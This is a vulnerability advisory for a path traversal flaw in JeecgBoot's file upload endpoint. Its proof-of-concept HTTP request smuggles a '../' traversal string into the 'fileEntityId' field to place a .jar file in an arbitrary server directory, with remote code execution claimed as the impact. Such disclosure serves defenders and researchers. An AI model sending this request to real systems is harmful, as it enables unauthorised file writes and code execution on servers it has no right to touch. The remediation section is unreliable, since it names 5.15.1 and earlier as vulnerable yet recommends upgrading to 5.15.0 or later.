# Vulnerability Summary: JeecgBoot File Upload Path Traversal Vulnerability ## Vulnerability Overview In the `/a/file/upload` endpoint of JeecgBoot, the `fileEntityId` parameter is vulnerable to path traversal. Attackers can upload files to arbitrary directories on the server by crafting malicious parameters containing `../`. ## Affected Scope - **Affected Versions**: JeecgBoot 5.15.1 and earlier - **Exploitation Conditions**: Requires file upload permissions - **Impact**: Remote Code Execution (RCE) ## Proof of Concept (POC) ```http POST http://localhost:8080/jeecg-boot/a/file/upload HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Length: 1325 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file"; filename="test.jar" Content-Type: application/java-archive ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="fileEntityId" ../../../../../../../../../../tmp/test ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file"; filename="test.jar" Content-Type: application/java-archive ------WebKitFormBoundary7MA4YWxkTrZu0gW-- ``` ## Remediation 1. **Method 1**: Add parameter validation in `FileUploadController.java` to intercept illegal parameters containing `../` or `\`. 2. **Method 2**: Create a custom Service implementation class to validate `fileEntityId` before uploading. 3. **Method 3**: Upgrade to version 5.15.0 or later and repack the project.